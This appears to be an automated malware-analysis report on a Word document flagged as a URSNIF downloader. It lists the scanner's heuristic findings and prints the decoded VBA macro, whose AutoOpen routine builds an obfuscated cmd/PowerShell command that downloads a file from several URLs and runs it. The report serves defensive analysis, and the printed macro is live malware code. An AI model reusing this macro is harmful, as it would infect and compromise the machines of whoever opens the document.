Verdict: MALICIOUS (risk score: 202)
Malware Insights
MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)
The sample contains a VBA macro whose AutoOpen subroutine uses the Shell() function to execute a command. The macro constructs a command line that sets environment variables and appears intended to download a payload. The ClamAV detection and the heuristic firings together strongly indicate a downloader family, most likely URSNIF, which is known for macro-based execution.
Heuristics (6)
- ClamAV: Doc.Downloader.URSNIF-6729855-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 63856ccbd7ce964202f763da589f5c4e71610963cfb34115c084f560d936e244) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5855 bytes |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ENSFQkBPXDGVC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Hour "419833367" + "8029" + "rHQfY" + "MD"
VBA.Shell CleanString(v) + dZwUjccHtvXhrB + wYLawqWoz + zAGFHwq + DrqXFjJw + XjoalWNMSP + imzWrRlfMqN + wCjGHiws + QkiNQzMtzjYbk, 29 - 29
Hour "KShLnXcwl" + "900" + "UGT" + "263898586"
Hour "hF" + "Cw" + "5771" + "a"
Hour "399453159" + "j" + "465645180" + "133906325"
Hour "nCHVZPjEKoQwvI" + "dio" + "502785223" + "NjsJvBdo"
End Sub
Attribute VB_Name = "TTutMTvb"
Function zAGFHwq()
On _
Error _
Resume _
Next
Hour "491951978" + "522197538"
Hour "hz" + "tXq" + "197017589" + "1796"
LjnrUXiw = "cmd /V" + "/C" + Chr(1 + 4 + 5 + 3 + 21) + "s^e" + "^t" + " " + "^" + "s" + "l" + "=" + " ^ ^ " + "^ ^ " + "^ ^"
Hour "LaVhLMwhMjWSM" + "6853" + "59077737" + "38652072"
Hour "mtcfTi" + "28964707"
Hour "4995" + "3141" + "FzTPbLHoW" + "V"
CqYwUi = " ^ ^ ^" + " ^ " + " }" + "^}{^hc" + "t" + "^ac^}"
Hour "Aq" + "2281"
Hour "Mr" + "44551844" + "DD" + "322888913"
qSDOodhLqaN = ";^ka^er" + "^b^;^T" + "N" + "G$ me^" + "tI-^e^" + "k^ovnI" + ";)TNG$^" + " ,Sr^j" + "^$(^e" + "l^i^F" + "^d^a^" + "oln^w^o"
Hour "9181" + "bzUCDiskwwpHGr" + "C" + "fjdDAFAo"
Hour "3980" + "FBqkVk" + "3652" + "SGzIWjPs"
Hour "zPlTiVJGS" + "USRiEacbLq"
oBEhkDbQwsj = "^D" + "^.s^kR" + "$" + "{^yr" + "t{)" + "i" + "bC^$^" + " n^i^"
Hour "UNjfvfIR" + "140234673" + "wG" + "N"
Hour "EohbKAnmzbSbOh" + "WcKXNZZ" + "6390" + "2431"
Hour "343827448" + "JIt" + "3101" + "414688990"
KdIMIXksj = " " + "Srj" + "$(hca" + "er^o^" + "f^;^'" + "e" + "xe^.'+j" + "^aw^$" + "+^'\" + "'^+" + "cil^" + "b" + "^up:vn^"
zAGFHwq = LjnrUXiw + CqYwUi + qSDOodhLqaN + oBEhkDbQwsj + KdIMIXksj
Hour "FPW" + "5010"
Hour "444239114" + "XiwpWioARB"
End Function
Function DrqXFjJw()
On _
Error _
Resume _
Next
Hour "qYBTQwvzrUY" + "222" + "dKw" + "ifIQ"
Hour "iNiv" + "BiEO" + "QJMW" + "438302372"
Hour "4137" + "khduFuAKoSSRSs"
Hour "KIpjNI" + "453231151"
Hour "38993256" + "q" + "wCfioTIK" + "ti"
Hour "EtXO" + "448045028" + "z" + "7816"
QAHZXaUKfpN = "e^$^=" + "^TNG$^" + ";^'^2" + "1" + "^6^" + "'^ ^=^ " + "^" + "ja^" + "w^$" + "^;)'" + "@'(^" + "ti^l"
Hour "PujrJiE" + "4353"
SBJdMv = "p" + "^S^.^" + "'^y^I^" + "Yn" + "oC^"
Hour "8751" + "6817"
Hour "rp" + "ONSKcqULhRFsJm" + "7181" + "fHfDkjBXIFDHo"
Hour "wKWM" + "nERNpKEY"
Hour "208" + "3011" + "8370" + "viCtOaici"
Hour "226785625" + "Hnz"
tMEKOjmzW = "m" + "/m^" + "oc" + "^.hk" + "^ira^" + "p^dh" + "tr" + "^ama"
Hour "kYcKWFSuiGELiX" + "OzuE" + "Hli" + "KjJ"
Hour "wKSt" + "320744670"
Hour "431539811" + "LG"
Hour "414864760" + "259258549"
HEiAKX = "^" + "s//^:p" + "^t^th^" + "@V" + "^t^" + "yC" + "^" + "BEtpZ" + "/" + "m^oc." + "a" + "d^x^" + "eht/"
Hour "PJWsHcsVns" + "dv"
Hour "mnP" + "9456" + "iMvvj" + "UXAt"
Hour "SwjLqwuzznvhc" + "AsHS" + "jzXLslM" + "jI"
dpVtRH = "/^:^p^t" + "t^" + "h@^Z" + "^p" + "st^S^W" + "^9^f0/" + "^" + "tp"
DrqXFjJw = QAHZXaUKfpN + SBJdMv + tMEKOjmzW + HEiAKX + dpVtRH
Hour "1720" + "NzcPh" + "sw" + "913"
Hour "FasQPww" + "itQbXtrijXBH"
Hour "2889" + "qLE"
Hour "243585824" + "rZi"
End Function
Function XjoalWNMSP()
On _
Error _
Resume _
Next
Hour "UkSrtiZRqkqMnF" + "AlK" + "N" + "V"
Hour "k" + "j" + "1685" + "nDZ"
rElzLwadCXz = "^.si" + "lni" + "^a" + "^m/" + "/" + "^:" + "^" + "pt^t^h" + "@^J^"
Hour "8306" + "Xfw" + "233869674" + "EM"
Hour "arhjEdUX" + "wP"
XiRwbwZ = "7" + "^T" + "aS^" + "XV^m" + "^y^" + "1" + "/m^" + "oc" + "." + "rop" + "scn"
Hour "329832022" + "7326" + "UQGrwPdnL" + "jKhjDjF"
Hour "7719" + "373581489" + "200" + "215615163"
blqVhuQuAU = "^ani^." + "w" + "w" + "^w//:^" + "p^tth^" + "@^sZ^w" + "U" + "^4" + "4^d^Sk" + "^I" + "/cc^.^t" + "nec^s"
... (truncated)
```